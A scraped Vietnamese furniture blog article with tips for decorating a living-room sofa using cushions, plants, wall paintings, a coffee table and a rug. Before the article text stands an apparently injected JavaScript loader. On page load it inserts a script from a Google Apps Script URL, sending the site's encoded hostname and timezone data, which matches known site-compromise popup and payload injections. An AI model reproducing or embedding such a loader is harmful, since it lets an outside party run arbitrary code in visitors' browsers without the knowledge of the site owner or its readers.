var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Trang trí ghế sofa cho phòng khách tạo sự thu hút

 Muốn tạo sự thu hút cho không gian bên cạnh việc chọn lựa, bài trí sofa thì việc trang trí ghế sofa cũng vô cùng quan trọng. Trang trí ghế sofa cho phòng khách có nhiều cách khác nhau.

Với sofa phòng khách nếu bạn biết cách trang trí sẽ tạo nên vẻ đẹp rất ấn tượng và thu hút đấy nhé.

Trang trí ghế sofa cho phòng khách với gối ôm

Gối ôm là một trong những món đồ dùng để trang trí ghế sofa phổ biến. Gối ôm làm cho ghế sofa đẹp hơn, nổi bật hơn và bớt đơn điệu hơn. Gối ôm vô cùng nhiều các mẫu mã, màu sắc, họa tiết và bạn có thể thoải mái chọn lựa. Nếu muốn sự nổi bật vượt trội hãy chọn gối ôm bằng vải với nhiều họa tiết khác nhau nhé.

trang trí ghế sofa cho phòng khách
Bài trí ghế sofa với gối ôm tạo nên sự nổi bật

Trang trí ghế sofa cho phòng khách với cây xanh

Bạn có thể sử dụng cây xanh để trang trí cho bộ sofa cao cấp trong phòng khách của mình. Cây xanh có thể được đặt ở phía sau hay bên cạnh hông ghế. Nó vừa giúp bộ sofa bớt đơn điệu và cảm giác khi ngồi trên sofa bạn sẽ được hòa mình vào thiên nhiên. Trang trí ghế sofa cùng với cây xanh nên chọn loại cây to và cao một chút nhé.

trang trí ghế sofa cho phòng khách
Dùng cây xanh trang trí ghế sofa cho phòng khách

Trang trí ghế sofa cho phòng khách với tranh treo tường

Tranh treo tường cũng rất phù hợp khi dùng để trang trí ghế sofa. Tranh treo tường thường sẽ được treo phía trên ở đằng sau ghế. Bạn không nên chọn lựa quá nhiều các bức tranh để trang trí nhé. Chỉ nên chọn một bức tranh to hay vài ba bức tranh nhỏ kết hợp, treo lên tường phía sau bộ sofa là hợp nhất. Tranh treo tường vừa giúp bộ sofa sang hơn và bạn còn có thể chọn lựa để đảm bảo yếu tố về mặt phong thủy.

trang trí ghế sofa cho phòng khách
Trang trí ghế sofa với các bức tranh treo tường

Ngoài các món đồ kể trên thì các bạn có thể trang trí sofa nhập khẩu hà nội hay bất cứ mẫu sofa nào nhà mình thêm với bàn trà, thảm sofa. Hai món đồ này thì đã quá quen thuộc và phổ biến, cần thiết khi kết hợp cùng ghế sofa phải không nào? Trang trí ghế sofa để có được không gian đẹp sang hơn nhé.